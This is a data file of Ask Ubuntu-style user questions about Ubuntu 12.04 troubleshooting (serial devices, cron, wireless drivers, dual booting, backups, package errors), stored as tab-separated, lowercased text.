165219	what exactly are items in the /dev directory ?	i have been writing an application in c++ that transmits radio messages by writing to a modem connected to the serial port . to do this i need to get a file descriptor using code of the form fd1=open ( â/dev/ttys0âł , o_rdwr | o_noctty | o_ndelay ) ; this made me curious about the nature of the items in /dev . to try to get an idea of the contents of these items i tried a sudo cat /dev/ttys0 only to get the message cat : /dev/ttys0 : input/output error which did n't help my understanding at all . are these items actually a file at all or just a kind of link that allows access to the driver functionality ?
165223	how do i start certain services only when needed ?	i have a laptop . i use it for web+email a lot , and then some days for web development . using it for the latter , i need apache2 and mysql server running , but normally i do not . i 'd like a normal boot to not start apache and mysql , to conserve power , reduce boot times etc . but then to be able to start these services when needed . in the olden days i might have used runlevels for this , but that 's a bit old skool now , as i understand . what 's the best way to achieve this in precise ?
165225	how to automatically lock my computer after logged in via auto login	i have setup my ubuntu 12.04 lts ( unity ) to auto login after the computer is turned on after a power outage . so that the web server installed keeps running . but also i have to lock the computer right after logging in so that no one can use it other than me . how would i do that . gnome-screensaver-command -l does lock the computer . but manaully . i want it automated after login . i dont want anyone to be using the computer other than me .
165231	problem removing 3g mobile broadband dongle on 12.04	i recently upgraded my 3g mobile broadband dongle to a newer model . ubuntu recognizes it and i can connect/disconnect with no trouble . the problem comes when i try to safely remove the drive by right clicking its icon and choosing `` safely remove drive '' . when i do this i get a popup that displays the following unable to stop drive error detaching : helper exited with exit code 1 : detaching device /dev/sdc usb device : /sys/devices/pci0000:00/0000:00:04.1/usb2/2-4 ) synchronize cache : failed : no such file or directory ( continuing despite synchronize cache failure . ) stop unit : failed : no such file or directory i do n't really know what to do from here so i generally shutdown then remove the dongle as i do not want to damage it . is this a common problem ? am i safe to just pull the dongle out after this message . the message is not particularly informative so i am not sure how best to proceed . i never had this problem with the previous model . any advice would be very much appreciated . the model is identified as huawei td card storage
165236	a music player that can handle multiple artist tags	the mp3 format can handle multiple artists per track ( in the form of `` artist1\artist2 '' ) , and as far as i know other modern music formats can do the same thing . however , rhythmbox ( my default music player ) seems to be capable of only reading the first artist . are there any music players that can read and sort songs with multiple artists , or a plugin for rhythmbox that can provide this functionality ?
165239	trying to mirror screen on hd tv	trying to connect my laptop to an hd tv screen via an hdmi cable . it works for about 5 seconds and then the picture disappears on the tv and it turns black . not only this but when the screen does show some parts are clipped off from the tv ( including the start menu ) . how do i change the resolution , as under `` display '' only one resolution is available for the samsumg tv . thanks
165243	how do i undo the unity panel whitelist ?	is there a way to remove this setting ? i used it because a few things were n't showing up ( indicators and such ) and now everyone and they 're grandmother shows up on the panel . gsettings set com.canonical.unity.panel systray-whitelist `` [ 'all ' ] ''
165246	help w/ password	i can not remember my password as i have automatic log in . i need to change all my previous passwords ( not because of anything ubuntu did ) how can i find out what it is , so i can change it ? please help me with this . i thank you in advance .
165255	unable to install boot-repair	i am trying to install windows 7 on ubuntu . i created ntfs partition for windows 7 but i deleted a 5gb partition so i got a error message when i reboot ubuntu . grub rescue error to solve this error , i tried installing boot-repair software . here are the steps i followed : boot to livecd connect to internet open terminal give command sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update then give command sudo apt-get install -y boot-repair & & boot-repair now i get this error message : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package boot-repair
165257	do i need to partition my hard drive before i install ubuntu ?	do i need to do that manually , does the windows installer do it for me , or do i need to do it at all ?
165258	app indicator for software raid running degraded ?	anybody know of a unity indicator that will indicate if any of my software raid arrays are running in degraded mode ? really would be awesome ...
165260	is it easier/more reliable to install a windows partition over ubuntu ; or backup , install windows fully then install an ubuntu partition ?	i 'm starting an open university maths degree soon . i 'm being sent mathcad as part of the course . it relies on .net so does n't seem to work in wine . i 'm therefore going to buy windows 7 and dual boot . i understand installing windows is n't as user-friendly as installing ubuntu so , to try and preserve my sanity , i wanted to know which approach is easier to get working : keep my ubuntu 12.04 system and install a windows 7 partition using the windows 7 disk ; or install windows 7 , wiping ubuntu in the process , then install an ubuntu 12.04 partition using a live cd and restore from a backup ?
165261	how can i bind alt-space to open gnome-do ?	how can i bind alt-space to open gnome-do in ubuntu precise 12.04 ? i disabled the `` activate window menu '' unity alt-space shortcut from the keyboard settings , but gnome-do still does n't receive the alt-space shortcut .
165266	is it possible to search for a package by filename ?	sometimes it is useful to search for a package that contains a certain file ? for example , when one is using texlive , one can notice that a certain dependency is not installed ( for example latex error : file 'fullpage.sty ' not found . i little research on the web shows that fullpage.sty is included in texlive-preprint package . sudo apt-get install texlive-preprint while testing fedora i learn that i could install a package by searching for a file , even without knowing the exact location . sudo yum install 'tex ( fullpage.sty ) ' which automatically ask for confirmation to install tex-preprint . is it possible to do this with apt-get or some ubuntu tool ?
165275	do i need a samba share if i have sftp working ?	i have a virtual ubuntu server set up , and the only file-sharing required is between my windows host and the /var/www directory on the ubuntu server . i using this setup primarily for wordpress configs . what i 've already done is created another user called wwwuser and assigned him to the www-data group with read/write permissions as follows : sudo usermod -g www-data wwwuser sudo chown -r www-data : www-data /var/www sudo chmod -r 775 /var/www using filezilla i can sftp to the /var/www folder successfully and read+write to it . the only case where i can see samba benefiting me is if i need to transfer files from the samba share directly to a live remote server . am i missing something else ? apologies also , i am relatively new to linux in general , but learning more all the time .
165276	load and show an image from the web in python with gtk 3 ?	i 'm writing an app on ubuntu 12.04 with python and gtk 3 . the problem i have is that i ca n't figure out how i should do to show a gtk.image in my app with an image file from the web . this is as far as i have come : from gi.repository import gtk from gi.repository.gdkpixbuf import pixbuf import urllib2 url = 'http : //lolcat.com/images/lolcats/1338.jpg' response = urllib2.urlopen ( url ) image = gtk.image ( ) image.set_from_pixbuf ( pixbuf.new_from_stream ( response ) ) i think everything is correct except the last line .
165277	recover broken window manager	i 'm running ubuntu 12.04 , 64 bit i noticed that `` compiz '' was eating 40 % of one of my cpus and wanted to find its configuration . after not being able to find anything in the `` settings '' with words compiz or similar ( i 'm used to 11.04 where i had 3 settings for fanciness of animations etc ) i started googling . most suggestions say to do this : gconftool-2 -- recursive-unset /apps/compiz or gconftool-2 -- recursive-unset /apps/compiz-1 i did the -1 action and my unity closed . restarting the computer does not bring any window manager back up . i get desktop with 2 icons , and no window manager . how can i solve this ? p.s shortcuts do n't work . alt-f2 does nothing , single tap on alt , ctrl , super does nothing . to open a terminal i have to open a desktop folder icon , then search for gnome-terminal in /usr/bin and open it that way . all windows that open up can not be resized etc .
165281	how to make your ubuntu filesystem read-only	i wonder whether there is a way to make my ubuntu read-only when i mount it on another linux system . let me clear what i want . i have a usb stick on where my ubuntu is installed . however , the problem is that i am able to change the files or folder on it by mounting it another ubuntu . how can i preserve it ? thanks ...
165283	why am i getting `` size mismatch '' errors from the iceland mirror ?	after installing ubuntu 12.04 ( clean install ) i fetch a bunch of program via synaptic ( installed specially ) , all programs worked except gimp 2.8 . so i tried purging gimp , install again ( no luck ) . checked broken packages and reinstalled them . when using the software center i get this msg : failed to fetch http : //is.archive.ubuntu.com/ubuntu/pool/main/o/openexr/libopenexr6_1.6.1-4.1_amd64.deb size mismatch tried also this : sudo apt-get purge gimp* sudo add-apt-repository ppa : otto-kesselgulasch/gimp sudo apt-get update sudo apt-get install gimp and get this msg : failed to fetch http : //is.archive.ubuntu.com/ubuntu/pool/main/o/openexr/libopenexr6_1.6.1-4.1_amd64.deb size mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i am wondering if the icelandic archive has an outdated version or something ? would really like to install gimp 2.8 but gimp 2.6 is ok to . i am also wondering if i am doing something wrong ?
165286	creating custom short cut keys ubuntu 12.04	i used to have my own shortcut keys to minify all the css and js files for my websites after i saved the original larger version of the file . but that was on ubuntu 11.04 and now i can not figure out for the life of me to get the alt + shift + e to run my command . anyone know what files to edit or what options screens to go through to complete this ? thanks in advance !
165287	software to monitor disk space and send email on threshold	i 'm looking for something that can monitor disk usage on my partitions and send an email alert when threshold is reached . for example , when sdb1 has 10 % disk space left it will send an email to me . it would be nice if it has some more advanced configuration options as well . alert me if the disk is filling up quickly and such . i do n't want logs sent to me on a daily/weekly etc . basis , just when the threshold is reached .
165295	crontab not working as expected	i 'm using ubuntu 12.04 and i want to execute a script every 5 hours . i setup cron with crontab -e and putted * */5 * * * sh /home/cron_script.sh the script is executed every minute . thanks .
165305	unity launcher autohide not working correctly	i do n't know if this is a bug , but my unity launcher autohide function stops working sometimes . i have autohide enabled , and launcher autohide works well most of the times , but now and then , the autohide stops working , and the launcher is always present . i go to system settings , and confirm that autohide is enabled . i then disable the autohide , enable it again , and still autohide does n't work . does anyone have the same problem ? is this a known bug ?
165312	are sony vaio s series or t series laptops compatible with both windows 7 and ubuntu 12.04 in dual-boot installation	i am planning to buy a new laptop which is suitable for both ubuntu 12.04 and windows 7 in dual boot configuration . i am looking for sony vaio two models with configurations : 13.3 '' s series customizable laptop ( svs131190s ) 3rd gen intel® core™ i5-3210m processor ( 2.50ghz / 3.10ghz with turbo boost ) intel® hd graphics 4000 4gb ( 4gb fixed onboard + 1 open slot ) ddr3-1333mhz 500gb ( 5400rpm ) hard drive 13.3 '' t series customizable ultrabook 3rd gen intel® core™ i7-3517u processor ( 1.90ghz / 3.00ghz with turbo boost ) intel® hd graphics 4000 500gb ( 5400rpm ) + 32gb mlc hybrid hard drive with raid 0 6gb ( 4gb fixed onboard + 2gb removable ) ddr3-1333mhz can anyone please tell me which laptop will function better for dual booting ? any help/comments are really appreciated .
165315	installer cd wo n't boot when installing ubuntu server 12.04	i downloaded the iso file of ubuntu server 12.04 ( both 64 and 32 bit ) and i burnt the image to a blank dvd but the installer is not booting ( even when i choose dvd-rom as the first boot device ) . my motherboard is asus , my os is ubuntu desktop .
165318	running the bare minimal processes in ubuntu	i was wondering if there was a why to add to my shell script , for running minecraft , that will shutdown everything that is n't needed to keep the system running . only the minecraft process and for it to be reopened when minecraft is closed ? i 'm very very new to ubuntu 12.04 or linux in general . been learning as i go along .
165319	how to get my ae1000 adapter to work ?	so i am so frustrated because my wireless netowrk is not getting picked up by my laptop so i put my ae1000 cisco adapter in it but it needs the driver to make it work ! how do i get it to work ? if you need more info please ask and i will give you what you need . please help me ! ! : ' ( my verion is 12.04 ubuntu
165320	grep invalid option on ubuntu	i 've already removed and reinstalled grep on ubuntu but still the same error persists . whatever grep command i type i always see the following output : grep : invalid option -- '=' usage : grep [ option ] ... pattern [ file ] ... try grep -- help for more information.` so even grep -v results in this error , or grep -- help same thing ! /bin/grep has the same byte size as it does on my other identical hosts , where it works fine , so it 's likely to be some environmental variable or local setting . any ideas ?
165323	i would like to set up a ubuntu os on amazon web server , how do i do this	i am trying to set up a virtual os ( ubuntu , windows ) on amazon web services to run apps 24/7 and to have anytime i log in on the internet . is this a possibility to do and if so how ?
165326	ar9285 wireless ( yet another ) on acer aspire one 532h-2676	there are literally hundreds of questions with people asking about this wireless device on askubuntu.org . i 've spent about 12 hours trying to get it working , to no avail . it 's time to solicit some expert help . information : acer aspire one 532h-2676 ar9285 wireless ubuntu 12.04 / updated via ethernet connection ( ditched windows - so this needs to work ! ) problem : the wireless device connects to the router and receives an internal ip , however , no amount of finagling seems to be able to provide me with anything save momentary internet access . i can ping -c 10 192.168.0.xx my address , but i ca n't ping the router ( 192.168.0.1 ) or the internet ( google.ca/com ) . what i 've tried and read elsewhere on askubuntu/linuxforums/ubuntuforums installed sudo apt-get install linux-backports-net- $ { uname -r ) ( expected compatibility drivers ) edited ../ath9k.conf with options ath9k nohcrypt=1 ( read post about hardware encryption problem ) tried using wicd instead ( read post that this worked for some pre 12.04 ) fully removed and reinstalled nm sudo apt-get purge network-manager* ... sudo apt-get install network-manager* ( read post that this worked for some ) details people usually ask for on other questions $ sudo lshw -c network *-network description : ethernet interface product : ar8132 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth1 version : c0 serial : 70:5a : b6 : d8:99:53 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory:57000000-5703ffff ioport:5000 ( size=128 ) *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 78 : e4:00:24 : a0:19 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-26-generic-pae firmware=n/a ip=192.168.0.19 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory:56000000-5600ffff $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : acer-wireless : wireless lan soft blocked : no hard blocked : no $ lspci 00:00.0 host bridge : intel corporation n10 family dmi bridge 00:02.0 vga compatible controller : intel corporation n10 family integrated graphics controller 00:02.1 display controller : intel corporation n10 family integrated graphics controller 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) 00:1f.2 sata controller : intel corporation n10/ich7 family sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 01:00.0 ethernet controller : atheros communications inc. ar8132 fast ethernet ( rev c0 ) 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) dmesg at startup http : //pastebin.com/gkrmmc93 ( it 's set to be removed in a month , if you see something in there that identifies the problem please denote it and i 'll update the question with the line ( s ) in question so some other unlucky person can dmesg | grep ... for it .
165327	rerun previous command under sudo	i want to be able to run a command , it fails cause it does n't have proper permissions . then i can write `` please '' to sudo the command i just ran . here 's what i want to do in the terminal : $ run command '' you do n't have access to do that '' $ please '' ran successfully '' i saw that ! ! will grab the previous command , so i thought i could use that , but i ca n't get it to work . my please.sh shell script looks like this , but i ca n't get any of these to work . it just says `` command not found ! ! '' and prints out the sudo usage . # ! /bin/zsh # sudo ! ! # sudo ` ! ! ` sudo $ ( ! ! )
165337	my dvd drive wo n't detect any cd media ( dvds seem to work ) . is there a way to fix this ?	i have a similar problem to what is described here : http : //h30434.www3.hp.com/t5/notebook-hardware/dv7-3079wm-bd-dvd-cd-drive-grinding-sound-won-t-read-cd-r-data/td-p/1211755 i have not tried anything in windows ( yet ) , but i 'm getting desperate . it seems that the drivers need to reinstalled in the case of windows , but what about ubuntu ? i 'm going to test this with a live usb and post the results , but any help would be greatly appreciated . output of sudo hwinfo -- cdrom : > hal.1 : read hal dataprocess 18596 : arguments to dbus_move_error ( ) were incorrect , assertion `` ( dest ) == null || ! dbus_error_is_set ( ( dest ) ) '' failed in file ../../dbus/dbus-errors.c line 282 . this is normally a bug in some application using the d-bus library . libhal.c 3483 : error unsubscribing to signals , error=the name org.freedesktop.hal was not provided by any .service files 32 : scsi 400.0 : 10602 cd-rom [ created at block.247 ] unique id : kd9e.ct9jzcqa6re parent id : w7y8.+uo0cjwsifa sysfs id : /class/block/sr0 sysfs busid : 4:0:0:0 sysfs device link : /devices/pci0000:00/0000:00:1f.2/host4/target4:0:0/4:0:0:0 hardware class : cdrom model : `` optiarc bd rom bc-5500s '' vendor : `` optiarc '' device : `` bd rom bc-5500s '' revision : `` 1.83 '' driver : `` ahci '' , `` sr '' driver modules : `` ahci '' device file : /dev/sr0 ( /dev/sg1 ) device files : /dev/sr0 , /dev/cdrom , /dev/cdrw , /dev/disk/by-id/ata-optiarc_bd_rom_bc-5500s , /dev/disk/by-path/pci-0000:00:1f.2-scsi-4:0:0:0 , /dev/dvd , /dev/dvdrw device number : block 11:0 ( char 21:1 ) drive status : no medium config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 20 ( sata controller ) drive speed : 16 it says here no medium , but i have a blank cd in the drive .
165341	window disk partition not shown in ubuntu installation process	i had installed windows os on my laptop and i tried to install ubuntu on the next drive . but during the installation process , the ubuntu installer does not show or recognize my drive partitions ( created through windows ) . but on ubuntu live session , it shows the partition and contents . i think the problem is with windows grub file is n't detected by ubuntu . is there any possible method to handle this problem without formatting the windows drive ( partition ) ?
165344	how to remove specific entries found in dash	when i type in the dash menu it looks for anything i have opened that resembles what i am typing . in this case i do not want to show some entries that appear when i type screen . for example i want to remove the 2 that appear in the list :
165345	boot fails after showing ubuntu screen and just sits on screen showing [ ok ] . tried removing fglrx but still ca n't get it to go	just all the sudden compiz failed and i could n't get it to relauch so i rebooted the system . ever since , after the ubuntu login screen ( with 5 round circles in the middle . it just goes to the next screen which is black with various tasks displaying [ ok ] at the end and freezes . i 've switched over to a terminal session and removed fglrx and reinstalled xorg-default drivers . this did n't help because i had a suspicion it was an issue with x . not sure where else to go but a reinstall . any one have any ideas to try or to get further where the boot is failing . of note , when i reinstalled to the open source drivers , i got a screen saying hardware not detected properly and i hit ok to continue for one session . then froze at the same screen again so appeared not to be to open source or proprietary drivers . link to screenshot after startx is run : https : //www.dropbox.com/s/udo7xxfpkg79w0h/2012-07-19 % 2012.41.11.jpg
165346	why ca n't i cd to this file ?	when i execute following command : cd ./avast4workstation_1.3.0-2_i386.deb or cd '/home/ravi/avast4workstation_1.3.0-2_i386.deb' i get this error message : bash : cd : /home/ravi/downloads/20120409121148448001.pdf : not a directory how do i solve this problem ?
165347	' can not access secondary gpu ' error with bumblebee	i tried to run optirun glxgears and i got this output : [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ error ] aborting because fallback start is disabled . what should i do ?
165351	grep and cut in a cue file + mkdir creates a directory name with a question mark	i do this : var=`grep genre billy_cobham_-_drum_\ & _voice_2.cue | cut -d ' ' -f 3` mkdir $ var the file.cue interested line is : rem genre funky+jazz when mkdir creates the directory , the directory showed with ls is : funky+jazz ? i made many tests to understand with many command like awk grep cut sed in all tests reading the terminal the results is `` funky+jazz '' . but the string have an hidden `` starting new line '' . and , it generated the strange result when mkdir command is invoked . if i open terminal in the funky+jazz directory the shell appear as : $ @ host : ~/desktop/test/5/funky+jazz i do n't know how to solve this problem and have a correct directory name without question mark.this is my cue rem genre funky+jazz rem date 2006 rem discid 920bfb0a rem comment `` exactaudiocopy v0.95b4 '' performer `` billy cobham '' title `` drum & voice 2 '' file `` billy_cobham_-_drum_ & _voice_2.ape '' wave track 01 audio title `` waveform '' performer `` billy cobham '' index 01 00:00:00 track 02 audio title `` real funk '' performer `` billy cobham '' index 00 05:04:19 index 01 05:06:21 track 03 audio title `` running '' performer `` billy cobham '' index 00 09:42:52 index 01 09:44:56 track 04 audio title `` final destination '' performer `` billy cobham '' index 00 17:30:36 index 01 17:32:38 track 05 audio title `` one more day to live '' performer `` billy cobham '' index 00 24:26:37 index 01 24:28:38 track 06 audio title `` ozone part 1 '' performer `` billy cobham '' index 00 29:41:47 index 01 29:43:39 track 07 audio title `` ozone part 2 '' performer `` billy cobham '' index 00 31:56:06 index 01 31:56:16 track 08 audio title `` take seven '' performer `` billy cobham '' index 00 38:24:64 index 01 38:26:68 track 09 audio title `` let me breathe '' performer `` billy cobham '' index 00 44:28:41 index 01 44:30:41 track 10 audio title `` amazon '' performer `` billy cobham '' index 00 48:54:16 index 01 48:56:20
165353	how can i remove old ubuntu backups ?	i am running unity on ubuntu 12.04 and have started using the backup program . i ca n't find anywhere to manually remove old backups . i do n't want to wait until the disk drive gets full , as it is also used for other things .
165356	x11 ignoring options in configuration for input device	i have reinstalled my system , a samsung series 9 laptop with a clickpad , under ubuntu 12.04 . i reinstalled it a few times and re-configured it with the same os because i had issues with the filesystem getting corrupted ( ext4 on this ssd with this kernel is n't so great apparently ) . anyway , i re-installed it for a nth time and configured the clickpad the same way as before : /usr/share/x11/xorg.conf.d/52-clickpad.conf section `` inputclass '' identifier `` np900x3b clickpad '' matchistouchpad `` on '' matchdevicepath `` /dev/input/event* '' option `` clickpad '' `` 1 '' option `` clickfinger1 '' `` 1 '' option `` clickfinger2 '' `` 3 '' option `` clickfinger3 '' `` 2 '' option `` fasttaps '' `` 1 '' option `` rightbuttonarealeft '' `` 2000 '' option `` rightbuttonareatop '' `` 1500 '' endsection i had the same configuration before ( i actually copied it from a usb drive ) , and it worked fine . yet i get this after restarting x : $ synclient -l | grep -i `` \ ( right\|click\|fast\ ) '' rightedge = 2974 clicktime = 100 fasttaps = 1 clickfinger1 = 1 clickfinger2 = 3 clickfinger3 = 2 arearightedge = 0 clickpad = 1 rightbuttonarealeft = 0 rightbuttonarearight = 0 rightbuttonareatop = 0 rightbuttonareabottom = 0 middlebuttonarearight = 0 it appears that all options are being handled properly , except the rightbuttonarea [ ... ] ones . looking at x logs gives me no clue about the problem , with no errors , only this : [ 1499.416 ] ( -- ) synaptics : etps/2 elantech touchpad : vendor 0x2 product 0xe [ 1499.416 ] ( ** ) option `` clickpad '' `` 1 '' [ 1499.416 ] ( ** ) option `` fasttaps '' `` 1 '' [ 1499.416 ] ( ** ) option `` clickfinger1 '' `` 1 '' [ 1499.416 ] ( ** ) option `` clickfinger2 '' `` 3 '' [ 1499.416 ] ( ** ) option `` clickfinger3 '' `` 2 '' [ 1499.416 ] ( -- ) synaptics : etps/2 elantech touchpad : touchpad found if i set them manually using synclient : synclient rightbuttonarealeft=2000 ... then it works , but obviously i have to set manually them every time i start x . note that rightbuttonarealeft depends on clickpad=1 to work , although it is set correctly . so it seems that the rightbuttonarea [ ... ] options are simply ignored by x . like i said , i just reinstalled the system a few times before and it worked perfectly fine on every occasion . any help is greatly appreciated .
165357	help with migrating wubi to it 's own partition	ok i really need help now . i 've began building android from source code , but i 'm using a wubi installation . and sadly , 30 gb is n't eve enough space for the first build . so , i want to migrate so i can expand my space to 50 gb . how can i expand my disk space once i migrate ? excuse me if this has been a past question . oh yeah , i forgot to add , i want to dual boot windows 7 and ubuntu . and help will be greatly appreciated .
165360	how to make an interrupt assignment in the terminal stick	i followed the instructions from enzotib 's answer on making ctrl+c copy text in gnome-terminal ? to make the ctrl-c and ctrl-v keys act consistent in the terminal and then re-assign ctrl-j to be the cancel/interrupt key for ongoing processes . the instructions works great ... until i close the terminal . next time i open the ctrl-j has to be re-assigned . i do n't want to have to type out stty intr ^j each time i open terminal . how do i make that key assignment stick ?
165361	how to set the path where sudo apt-get installs	i am using ubuntu 12.04 and am unable to find where i install software using apt-get . in the dash if i type eclipse or the name of the software it appears , but i am unable to right click on it and open the folder location . does anyone know how to find where exactly a particular software is installed using the dash . also is it possible to set a software to be installed to a particular location when using the apt-get .
165363	`` quickly package '' command failed without the relevant error message	when i do quickly run , my app runs perfectly but when i use quickly package it just aborts . it says there was an error but does n't show the error message . $ quickly run /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `mybrowserwindow ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) $ quickly package ... ... ..ubuntu packaging created in debian/ ... ... ... ... an error occurred while creating the package . error : the command failed package aborting
165367	time differences between windows and ubuntu partition ?	i 'm running a tri-boot setup with windows 7 , ubuntu 12.04 , and backtrack 5 all running on separate partitions . when ever i boot into windows after linux the time is all messed up and i have to manually reset it . the same happens the other way around . how do i fix this ? thanks !
165369	can i reasonably link in c code to an application managed with quickly ?	i 'm looking around for a way to program some gui apps in ubuntu 12.04 . i ran across the quickly tutorial and the tool looks fantastic . it looks like the primary language you develop with is python , which is fine with me . but i know that i will need to link in c ( or other compiled ) code for intensive number crunching and to take advantage of the huge number of binary libraries out there . i understand that python is designed so that you can link c code into it ( although i do n't know anything about the details , such as whether it can be done dynamically , or whether you have to build a new python interpreter executable , etc ) . so my question is whether it is possible to fit in linked c ( or other compiled ) code into the quickly workflow , and if you do , can you still build deb packages to distribute your code . ( i would n't mind writing a few makefiles or scripts or whatever to do this . ) and are there any examples out there that i could take a look at ?
165376	what 's the best way to resolve `` read permission '' error when including /etc in backup ?	running ubuntu 12.04 and using the built in backup utility ( deja-dup ) to back up /home and /etc every night . some files in /etc fail with read permission error because , well , obviously backup runs under my user account and i do n't have permission to read them . i used to do this on 11.10 and it worked pretty well ; saved my bacon a couple of times . what 's the best way to reconfig so /etc backups run successfully ? obviously i do n't want to grant my user account read access to a bunch of files that are off-limits for a reason . is there a good way to get backup to sudo instead of running as me ? is there an easy way to set up a different job under root to back up /etc and invoke it with at /cron ?
165377	install ubuntu with windows 2000 without partitioning the hard drive	i really need help ! i have windows 2000 . but it can not start due to this error : windows could not start because the following file is missing or corrupt : \winnt\system32\config\systemced i do not have a repair disk or anything to fix it , because it does not boot . i can not partition the hard drive so here is my question , can i install ubuntu on the same hard drive as 2000 ? i desperately need to get all my items off of windows , yet remain able to boot to it .
165379	how to disable logging the flash drive in log files ?	if i plug in a flash drive ( pendrive ) then it gets logged in the dmesg and in the /var/log* files . how can i disable this ? i do n't want to disable the logging , i just want to disable the logs about usb flashdrives : dmesg ... [ 83400.640015 ] usb 2-2 : new high speed usb device using ehci_hcd and address 4 [ 83400.777225 ] usb 2-2 : configuration # 1 chosen from 1 choice [ 83401.386977 ] initializing usb mass storage driver ... [ 83401.387192 ] scsi4 : scsi emulation for usb mass storage devices [ 83401.387282 ] usbcore : registered new interface driver usb-storage [ 83401.387284 ] usb mass storage support registered . [ 83401.388725 ] usb-storage : device found at 4 [ 83401.388728 ] usb-storage : waiting for device to settle before scanning [ 83406.388491 ] usb-storage : device scan complete [ 83406.389480 ] scsi 4:0:0:0 : direct-access corsair ufd 1100 pq : 0 ansi : 0 ccs [ 83406.389923 ] sd 4:0:0:0 : attached scsi generic sg2 type 0 [ 83406.392468 ] sd 4:0:0:0 : [ sdb ] 7864320 512-byte logical blocks : ( 4.02 gb/3.75 gib ) [ 83406.393211 ] sd 4:0:0:0 : [ sdb ] write protect is off [ 83406.393214 ] sd 4:0:0:0 : [ sdb ] mode sense : 43 00 00 00 [ 83406.393216 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 83406.395834 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 83406.395838 ] sdb : sdb1 [ 83406.458088 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 83406.458093 ] sd 4:0:0:0 : [ sdb ] attached scsi removable disk ... or just : how to disable logging a given usb port ?
165381	can not update with 'sudo apt-get update ' or update manager	beforehand , excuse me , i 'm new to ubuntu and linux in general , so i may be overlooking something quite obvious ... i have been attempting to install tor ( it is an internet anonymity software ) via the instructions for downloading the software through their deb repository , but every time i go to update with sudo apt-get update , i receive the following error messages : w : failed to fetch http : //mirror.picosecond.org/ubuntu/dists/precise-updates/release unable to find expected entry 'commercial/source/sources ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //mirror.picosecond.org/ubuntu/dists/precise-backports/release unable to find expected entry 'commercial/source/sources ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //mirror.picosecond.org/ubuntu/dists/precise-security/release unable to find expected entry 'commercial/source/sources ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . i also receive the same message from update manager ... what exactly is going on ?
165386	wireless firmware on late 2011 macbook pro . ca n't connect to wireless	i dual booted ubuntu with my macbookpro . when i installed the os it worked fine and the only problem is that i ca n't connect to wireless . it works fine if i hard wire it but i ca n't get the right firmware for it . i tired going to system settings and then hardware drivers but it does n't show up . i have been trying to look around for answers but ca n't see to get anything to work . please help me out with solutions . thanks
165389	what does `` command returned 1 '' mean ?	i am trying to get a command to execute from within my mythtv interface on a mythbuntu computer . when i try a test command , touch /home/mythbuntu/test , it does n't work , and i see this entry in /var/log/mythtv/mythbackend.log : jul 19 14:29:35 mythbuntu mythbackend [ 1863 ] : w systemevent mythsystemevent.cpp:55 ( run ) mythsystemeventhandler : command 'touch /home/mythbuntu/test ' returned 1 i assume returned 1 means some kind of error status , but a google search did n't result in anything i could understand . what does returned 1 mean , and what does it tell me about the command i 'm trying to run ?
165392	login incorrect - fresh 12.04 server install	i have installed ubuntu server a few times today . the first time i installed it to a usb drive and it worked just fine . but it was too slow . then i removed that drive and installed again on a hard drive . i did this from both usb and cd with the same result : after install and restart , i can not login with the user and password i set during the install . i get the following error : '' login incorrect '' i am a noob to linux , so may need more specific directions around a fix . appreciate the help .
165393	how do i import opencv library into python 3.1 ?	opencv 2.1 was first installed when i had the original python 2.6 and this works fine . however after getting the python 3.1 , it has no module called 'cv ' after trying to import opencv . how to add these modules ?
165401	wubi froze while resizing virtual partition	ok , so i managed to figure out how to resize my disk space from 30 gb to 50 gb . now it was copying files , but now ubuntu is completely frozen at `` copying from /usr '' i have no clue what to do now , i 've left it alone for about 40 min . still frozen . please help . i do n't know what i should do . i used this method : http : //ubuntuforums.org/showthread.php ? t=1625371
